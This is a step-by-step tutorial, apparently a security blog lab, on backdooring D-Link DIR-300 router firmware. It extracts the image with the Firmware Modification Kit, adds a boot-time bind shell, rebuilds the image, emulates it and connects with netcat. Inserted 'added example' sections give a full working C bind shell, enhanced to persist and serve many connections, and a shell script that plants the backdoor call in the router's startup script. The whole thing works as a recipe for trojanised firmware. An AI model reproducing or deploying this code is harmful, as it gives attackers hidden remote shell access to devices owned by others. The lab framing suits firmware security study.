SETTING A BINDSHELL BACKDOOR IN A D-LINK ROUTER FIRMWARE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiweLjnD8ABGIKN_Dx8v8wDb7LzTUIwAnMZffiBKMjqN8klTIL-mCTDCyeGbHP_pOhhRVFuBzAJtXPGc-PTD12RcsIqEcGSJczTfEjnxmQj852NBhGT8iygBgZ33YyW4d2NgXF4LEV8sdFy/s400/layout.jpg)
1 - Introduction
- Firmware Modification Kit (FMK) allows making changes to a firmware image without recompiling the firmware from source.
- First, it splits the firmware image into its component parts and extracts the file system image.
- The user can then modify the extracted file system and finally rebuild a new firmware image from it.
- To download FMK:
https://github.com/mirror/firmware-mod-kit
- For further information:
https://bitsum.com/firmware_mod_kit.htm
- The goal of this exercise is to modify a given firmware so that a malicious program is added to the boot process.
- Once modified, the firmware is rebuilt and run (emulated with FAT, the Firmware Analysis Toolkit) as if it were the original firmware.
- The malicious program is a bind shell: it runs as soon as the firmware boots and accepts a remote connection (made with netcat) that gives a shell on the device.
2 - Extracting the firmware with FMK
- As in previous exercises, the firmware of the D-LINK dir-300b router is used again:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-L_m0tde9be02RPsJJZ2O5DpL46jkBFDyu-xmc31rs1xGbd7kZeLKVu4HVr5uEOuzMZ1Aom5FKFBMnuAR0Qdp0YXTbwm4nAoBEkQyFR5fSQ_q3JKdWC2jnu9sy22zGwfPVnPj37IsW1Ed/s1600/screenshot.8.jpg)
- Extracting the firmware with the FMK command ./extract-firmware.sh; the output looks much like Binwalk's, because FMK uses Binwalk internally to locate the file system inside the image:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSSOSwhGx1XVnr36P-Ji2IovPKaHk8ovblSVU1sLU2fzDkZmZSLKHycVcKytEoaWKYJVKYLmH9jGDmvH7akPdO9ljy18FcrfHzuTzOx0FUNCcMMNEMD8-2irbYevAMVhbAsr_hQKqG8aSn/s1600/screenshot.10.jpg)
- A new folder is created:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEsdhG1KHb9MZ6ItxCb9yPPU-wBQrwaztlBk73ED0Xce5uFCjuw1lb7n_dIh5CpNv3YSwFYRp1aCUTnpKB0wZgsjieisUlJSxlc4mhjhKZd2DsOunixYTlfTqtETFYZqGWZzhQQQ_QUA4H/s400/screenshot.15.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8b2I7j5bYev9fEvIgJrzzWERR1SJnDkM7S7erI8GPCyqhnRQDEqZO8gDYBrjaKPJbN0vUYcrvaLgUDZANbdrsv2yHgpC2kjxmjEMWMO5_IASyZmxw4e5dzi4cDPneAFMDuGwDrbIkAw_j/s1600/screenshot.11.jpg)
- Inside the subfolder rootfs, the whole extracted root file system is available:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQALASgbvxBVskXJKCG89qrevYPySO-mrvNH3OxaOFcyyQEIgMI7KEGITFJGnpy7qc-Rs-OZXWy-OAzCGCDCeWRkJQh5qfNF1U2xM5k4G8EH_3LdLvFb1laHL0fxav-zstO2NTasbjpco9/s1600/screenshot.12.jpg)
3 - Inserting a malicious script at the initial boot up process
- Because the goal of the exercise is for a malicious program to run at boot, it makes sense to place the call where the startup scripts usually live, for instance in the /etc/init.d folder:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8A7H9-wO6w_0HWQACw8V8uxszds50DLPGDNnKaZ6llSePwusfHI3J7Lm3PMxWem46I59NCNXvO11Q7Uijy94yPpcj8ZQOYrAXJ_upZz2voSuTABdtE7yqdWfhWCgBKk7h8O7JjNznSMrn/s1600/screenshot.16.jpg)
- /etc/init.d/S10system.sh turns out to be a link to /etc/scripts/system.sh.
- Opening system.sh shows all the scripts that are triggered automatically when the firmware boots:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4LplFMzUTH4KyztT5WdqB_hC4ixSv2Pgjj4TJLrH93UJD7-iOO_jRA1LG0gHGyJpwiHLO7CIWeUG5o-r9VlQaw-C6pEGo3IRveNuP1LT4CZlElr2xpyDTwnvkSFC84v0m2RNXjCMGeB39/s1600/screenshot.19.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgktFNgubkc8K1RAD7DVvAQx7pHCU-nti7X5YkoAK3gAIWLodbgmHiTQV2_xdSSq7bjH3loTiqNwQudgImPj8yqWQ7vmrub47hwnhDwj7YQ6kcFljw2Ov8o1Ka5zbvxiYqxJ6blEGuW7fT7/s1600/screenshot.17.jpg)
- Now, let's insert a call to a new program called bindshell (it does not exist yet; it is built in the next point of this exercise), placed in any location that exists at startup, for instance /etc/templates:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizlQvcM34yjEJJRQJ2alGicROHNTXcz0UiWZPLeiZj6QJy1SYbKTPb1erAyZHEy0HjzYoucgeLNYTO8Xmoq6-wAhlo-IFOByUx7LRqW7wu_2gtyxyewqahlZm3qSeInZWd-N0YUBKxm9AM/s400/screenshot.18.jpg)
- Confirming that the call to /etc/templates/bindshell has been added to /etc/scripts/system.sh; its exact position among the other calls does not matter, as long as it runs at boot. If the program blocks waiting for a connection, the call must be put in the background with & or the rest of the boot sequence stalls:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifxlAbQYXLPlCjmXUjLQoXoYs-G1NixsgP3J-XduioPByX4fXXk8br1MXTIviJxQhtA94qKxJx-TMwX70ADv6Y4GxhUaCRRG5Bmh5vgBEV_TW03EzOVkl2noAL9V5CIypx77uEWV3lGUtR/s1600/screenshot.20.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvMp13j7Htxlhrh3GZop06QYG-hl4c5sgkDZniMZ7k7kefiWWR55f7pCpk2qHvfLysZmziRvZT_RMJM8ghXyIRPa41iVif48NrSOfTliK_JV-ZEwhcgC5xkCnNXj_0-t0dWgDgj_KG8BFl/s400/screenshot.21.jpg)
4 - Bindshell
- This exercise uses the program BindShell.c written by Osanda Malith, available here:
https://gist.github.com/OsandaMalith/a3b213b5e7582cf9aac3
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1dvUJHpg2arIwCtbQY5w2Avdz0To5MPx50tIsX6RfzVhSkZNGK-0H6TJLr02sd8NPDGD9GHAbn3kXkddgKLpimpO_6y14XsyP7biOVsToC_P8e65YvscljyCOvzphYLmzf8qNTnrHX7ZR/s1600/screenshot.22.jpg)
- This program binds a shell to any connection that arrives at TCP port 9999:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpotfakrz7fbBh4cooYoB3NPw9hdQlcLBXouxnqAXT4qyGXMIUnjR2zvzDyc2or9BjDX3BfMU2op8wfk6WaRzImbuFGqtwqPMr9l4nu3c5eKD5wFXK8DCuZBejamBEBqFuU3puuOIx7Jo5/s1600/screenshot.23.jpg)
- The port is defined as a compile-time constant (9999), so it can be changed before compiling:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4WC8wpUkqLGZCyYB4tPjfKemPXs_hHro8AnXHgGPsgJLIA0N_w-6jwkxTEzWljjL9LTY0kkg1OX-aVXlNueW4Tsb7Q2YUge_5WhNlTDNquUBvABcCOwBuNFBOma63ZC9QX3q0ZIcchwLD/s400/screenshot.24.jpg)
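As an added example (not the page's code and not Osanda Malith's BindShell.c), here is a minimal bind shell in the same spirit, written so that it can be launched from an init script without stalling boot: it detaches itself, listens on the page's port 9999, and forks a /bin/sh for each connection instead of serving only one. The cross-compiler name in the build comment is an assumption; the Buildroot toolchain used on this page may use a different prefix.

```c
/* bindshell.c: added example, not from the original post.
 * Build for the router with the Buildroot MIPS toolchain, for instance
 * (toolchain prefix is an assumption):
 *   mipsel-linux-gcc -static -Os -o bindshell bindshell.c
 * Static linking avoids depending on the libc version shipped in rootfs. */
#include <netinet/in.h>
#include <signal.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define PORT 9999   /* same port as the BindShell.c used on the page */

/* Address the listener binds: all interfaces, port in network byte order. */
struct sockaddr_in listen_address(uint16_t port)
{
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);           /* forgetting htons() is the classic bug */
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    return sa;
}

/* Create a listening TCP socket on the given port; returns the fd or -1. */
int make_listener(uint16_t port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one); /* survive fast restarts */
    struct sockaddr_in sa = listen_address(port);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 4) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Replace the current process with /bin/sh whose stdio is the client socket. */
static void serve_shell(int client)
{
    dup2(client, STDIN_FILENO);
    dup2(client, STDOUT_FILENO);
    dup2(client, STDERR_FILENO);
    if (client > STDERR_FILENO)
        close(client);
    char *argv[] = { "/bin/sh", "-i", NULL };
    execv("/bin/sh", argv);
    _exit(1);                             /* only reached if execv fails */
}

int main(void)
{
    /* Detach, so the init script that launches us returns immediately
     * even if the call was not put in the background with '&'. */
    if (fork() != 0)
        return 0;
    setsid();
    signal(SIGCHLD, SIG_IGN);             /* Linux reaps finished shells for us */

    int srv = make_listener(PORT);
    if (srv < 0)
        return 1;
    for (;;) {
        int client = accept(srv, NULL, NULL);
        if (client < 0)
            continue;
        if (fork() == 0) {                /* child: becomes the shell */
            close(srv);
            serve_shell(client);
        }
        close(client);                    /* parent: back to accept() */
    }
}
```

The difference from a single-shot bind shell is the fork() before the accept loop and the fork() per connection: the first keeps boot from blocking, the second keeps the backdoor alive after the first session ends.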
5 - Compiling BindShell.c
- Because the D-LINK dir-300b router has a MIPS CPU, the program must be cross-compiled with a MIPS toolchain. The toolchain's word size and endianness must match the router's; running file on an existing binary from rootfs (for example /bin/busybox) tells which variant is needed.
- A MIPS cross-compiler (toolchain) can be obtained from Buildroot:
https://buildroot.org/downloads/
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqZvN5tyUOS8BAptaEFzClnf02t0uyNnfIJv3ascmkpdXvxbeRrveW1I3weps98bDxbadZeZFG-4vU9O6-sHyrVDMIS0B6L33L5h6QQaBn8ZDCOfposehlZSNn3cfy-8LrMtdqrZ1P61OE/s1600/screenshot.26.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN8EapBO73nQOeSpBxYcN7tOuD_gI90IbdX5-sKAhqzz1awNnAbada_-rhAoE6XAux22bN1YbAd8RlQzHvQ7jh2lVw9tPaMLmaCXYsGoygZiDnDSqee1NE4KEgaNdNYkHX2lIr3AcpZO4r/s1600/screenshot.25.jpg)
- Once downloaded and unpacked as usual (decompress and untar), this is the Buildroot option used to cross-compile C programs for the MIPS architecture:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiws24M1YzGAYcrimLwGPR7EwjKUiSIhP7THTgBAmorR9HI9ZM9YViM3JsAIPr4qDJOzQDE3UBCW1TKRfxIYmNq1ZuqUCebD-SZk350kUKFiht2-qNAJ8Pa6vmNbiogQ5gIo9qLl_7IDysR/s1600/screenshot.27.jpg)
- Putting BindShell.c in the same folder as the compiler:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3VEHiZsnSGaOWsWFr3jcMi5IavQb9vkoTVCq54GykIPxNkBM8HAR_4XgFlIfh1zTv64mCX9pZYGD71o8UehWrC3dZwGQkG1OZnoX5ii7myeoYHvzBG3glGWoZSYi67DqMwyEn0nSZ_bRM/s1600/screenshot.28.jpg)
- Compiling and naming the resulting binary bindshell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjooIjRZW2xpNUaXkNcMAHWThsY8HslQsEY3AcNEdDtxOap0izMn_MEANoEr3ZniPWoDx8GVIcv8hdDiHCr3QttrpCoQTj0L7rdBZCBMYJ-ltCURDp4d_St1b9FhfARyWKQDKmzxIJcJn-F/s1600/screenshot.29.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO2DH4kJCUOkYMaaBDebS6irFrfGT7peb06-a_b1htC7SSQybaxFJSWUJp-qtDWgtQyA_a0mVLTuEp8uV8dSOHgnF9iU0j4iWGQtncsQcEV9TuAm5lajY9jqYqo3_xks7pL1u9aGRVxFOm/s1600/screenshot.30.jpg)
- Copying bindshell into /etc/templates of the extracted rootfs:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Q3IpoBB1lEJqSJ-5jkxM_DXYVKWi2L2O0bh6Wlyq7xbx2R1X9AkDYVbAliM9VinqqlA0u9GCpZdWC6qzMU36udeZ-nPVwK6BVkGF6Wsnq06kmrfrzBrx8Kzjr1vKjWQS9HJ3dTTNo894/s1600/screenshot.51.jpg)
- Now the bindshell program is in place, ready to be launched as soon as the firmware boots:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglVzL-RbLIhVfU6_8wbriMT0w__799t_iZ5J4AbeY3-dqseE-wy98an3eTK8K3B7Mqz0w_HZYJRlevZ3f0-lYvq_26osnMTs99qlY2djVjQcr6fmJtiWPM6UMbtRc1wLMzXlSGKWdUk1ju/s1600/screenshot.35.jpg)
- Checking that bindshell is an executable built for the MIPS architecture; its word size and endianness should match those of the binaries already present in rootfs:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhljpOlZsqbAAM8mwKnIHBC_dHNJmcq6-6rgbvS_B-7i6u0UkxPoI_Fzr_nyCIuoOCPK_7hjKyZR3gQL7nLTrMLGmKfubCf2olbR0wcphHsg8xzfWUnG0zazwGq6YFrSb_MivB-nEaqMNga/s1600/screenshot.36.jpg)
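Added example for the two steps above, the call inserted into the startup script (point 3) and the architecture check on the compiled binary (point 5); it is not part of the original post. A small POSIX sh helper appends the startup call to /etc/scripts/system.sh inside the extracted rootfs, and a second helper compares the ELF class, endianness and machine of the cross-compiled binary with a binary already in the rootfs, so a toolchain mismatch (for instance big-endian MIPS for a little-endian router) is caught before the image is rebuilt. The rootfs path fmk/rootfs (FMK's default output directory) and /bin/busybox as the reference binary are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Paths /etc/scripts/system.sh and
# /etc/templates/bindshell follow the page; fmk/rootfs and /bin/busybox are
# assumptions (FMK's default output directory and a typical rootfs binary).
set -eu

# Append the backdoor call to the end of system.sh exactly once, backgrounded
# so a listener that blocks in accept() cannot stall the rest of the boot.
add_boot_hook() {
    rootfs=$1
    init="$rootfs/etc/scripts/system.sh"
    hook='/etc/templates/bindshell &'
    [ -f "$init" ] || return 1
    grep -qxF "$hook" "$init" || printf '%s\n' "$hook" >> "$init"
    grep -qxF "$hook" "$init"
}

# Print "<class>/<endian>/<machine>" from an ELF header, e.g. "32/LE/8"
# (8 is EM_MIPS). Reads the header with od only, so it works where file(1)
# is missing; e_machine sits at bytes 18-19 and its byte order follows EI_DATA.
elf_ident() {
    f=$1
    set -- $(od -An -tu1 -N20 "$f")
    [ $# -ge 20 ] || return 1
    [ "$1" = 127 ] && [ "$2" = 69 ] || return 1       # 0x7f 'E'
    case $5 in 1) class=32 ;; 2) class=64 ;; *) return 1 ;; esac
    case $6 in
        1) endian=LE; machine=$(( ${19} + ${20} * 256 )) ;;
        2) endian=BE; machine=$(( ${19} * 256 + ${20} )) ;;
        *) return 1 ;;
    esac
    echo "$class/$endian/$machine"
}

# Succeed only when the reference binary and the new one share class,
# endianness and machine; otherwise the new binary will not run on the target.
check_elf_matches() {
    want=$(elf_ident "$1") || return 1
    got=$(elf_ident "$2") || return 1
    [ "$want" = "$got" ]
}

# Usage: sh hook.sh run   (after ./extract-firmware.sh and cross-compiling)
if [ "${1:-}" = run ]; then
    add_boot_hook fmk/rootfs
    check_elf_matches fmk/rootfs/bin/busybox bindshell \
        && echo "bindshell matches target: $(elf_ident bindshell)"
fi
```

After both checks pass, copy bindshell into fmk/rootfs/etc/templates, make it executable, and rebuild with ./build-firmware.sh as described in the next point; the hook line is compared as a whole, so running the helper twice does not add a second call.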
6 - Building the new firmware
- So far, the original firmware has been modified by inserting a bindshell program that is launched from a startup script when the firmware boots.
- For that modification to take effect, the new firmware image must be rebuilt with FMK's build-firmware.sh:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhniTMUS_nUq3NQ_7VX39nf0KnGyHeiMWAj70HWGzLoJadUBhH75KxRZf7ES1OllKBkPOJYZxZmtrxzu4nIOErfrdTZMgwW8uYjiG9qoMAL_iGhXzSmn2mMddHLnlJ3QjbzpomX82giTy9t/s1600/screenshot.37.jpg)
- Running ./build-firmware.sh on the (now modified) dir300b_v2.05 directory:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH40ZIdJ5TwqVLntt12537FHlMRlIn8yLhW1w98xKxglVAg6-G_CjMaj-uYJv2fUp1oOVuK5buJdSRx1BOSEHXveXXdBIE6S1oaOGQazWlDRPLCFGcb8cUpn_oqhZ4bPQdmS9Ck6P2J2IV/s1600/screenshot.41.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6lBd4iFhWx4QmyGByiw2RavNErghk3oEwCnDJqHAIW4uZKmKjWyQf8mUBskkpvl-w2D-OdfFLKst7ihzegyr-1V7LqVCMpK43Oe36sCZhzXYIqE7h892mWo0uFNLGK1Q5zUENbBa9RDgX/s1600/screenshot.40.jpg)
- The ERROR messages above can be ignored here, since the firmware image is still rebuilt correctly.
- The resulting output is a file named new-firmware.bin, identical to the original except for the added bindshell binary and the call to it in the startup script:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuaUjf2N2kUjYECx33ydZ212gaQc2Wxfs3pUmh79lcQu_2QuGTZT6zyzCTUUStsIlM_2xViuVgrnph5A_R6WZJGH4WrjZO7E3MPW8M4SkylJZe49BR1Gh2MVannAV1t30Fcx34JOVXDEps/s1600/screenshot.42.jpg)
7 - Emulating the modified firmware with FAT
- Now it is time to emulate new-firmware.bin with FAT, as in previous exercises:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaxQLhsJXp4jPtPpvpI2GokwlmZZ6h22AXG7PpNlFCizJHfkuOf61RXHCetnMZYcLFHS_3-Ud7be7jRGE__vsjhS4dHAEQk_PiOycL-vuw__GYJghhdzGUhXz2uEHqoXBqEYuWKKQDMPLk/s1600/screenshot.43.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7uSvlRYmJo4z0huXwqPiowX9qyhs8drjDwqs8fRqNpE_mYvRpub8ZbqMQkmX1Goorr_z1JNV7oYDzF3_NkWaEX9QGefuRSlehj0oReNUTa12L5Fw05QjMOBTq0eV-ijANdqxtGYEGzk1W/s1600/screenshot.44.jpg)
- Launching fat.py and entering the password (firmadyne) when prompted:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0wwpGO3ZrajTQBRkOqkOtGXHTO6Jtk9nIXd0vzDkC0GwEWrtAJMyqN0JRPyqVG9DEpvBl_fQv1tYOvIemmCLOKZrb-pP_8j1yIl6usy2Tjbowr9J_LHvUdkvyBx-4w0Etlhb1JbffNeI/s1600/screenshot.45.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDtIruwsdZedzuzIayAKLhyMMtR9GZacO61AhQBk_xLsfLvySzSMITozkEhtNxvhU1hBmzMOcOo2qJgHbnjar99mlGT0gwH6GmWjfNgiZuJRz7utlU1CsyrSiumJdnZdjT_Z3DaA89RHXj/s1600/screenshot.46.jpg)
- Browsing to 192.168.0.1, the emulated new firmware is available and looks identical to the original one:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ8PtNfJBLhXMGJ9KOfw6h81iBLwX-j3cp7aZqBsc6103gldMheggQCa_ULQ20DqEvn1UBmKB5G8vH5qAhLgxi8ILBNwmv62KwpsTfvS_0FlVb9qHdDjijk5kzLVpUjsWoWqz0aHuhmwdc/s1600/screenshot.47.jpg)
8 - Connecting with NETCAT
- However, there is now a very important difference from the original: a hidden program (bindshell) was launched while the firmware was booting.
- Connecting with nc to 192.168.0.1 on port 9999 gives a remote shell, from which the whole file system of the firmware can be browsed:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-NGBlU0QVW3EFV_r0jRlW7Tq5QxWb-d3veWuBcl7JHYR7uvpgJAWqAiMo-KfzByZOg_HKqXuC-EY-PdLUUI7yac1kNjLNdzNJOms9uleom7tmtDA_lbSpoE4FEBLBrVA2j0CTqmOHV0T-/s1600/screenshot.48.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBlkpXddH_BQZXPXC3PlgSyDs5RsV3cDCvLriuu-ioMziQWbhS6JBQq-tXsMmh0p4qeDccVnE4nXovpkOcn1Y3hbS-TVaL2UIwx0-fiuVvm089Lj4e3SqaP3pW3PgoF2tL159nsWVBYGp/s320/screenshot.50.jpg)
- It is interesting to notice that the CPU reported is of MIPS architecture, even though the emulation is running on an x86 host: FAT uses QEMU to emulate the MIPS system, so the cross-compiled bindshell runs unchanged.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6kwYLXBdCpfWlxsCao_LByUAn-cToj6wQOv0SS-H_P_h9ijiGaKQUKADLchRfQ8N0zGfJA6T_wy6_1vrTpXBjWz0Cjpc9rQD2e4IBLQxkuHaglDDINSII_GZmVsH3bACh4IAYs6xHaNP2/s1600/screenshot.49.jpg)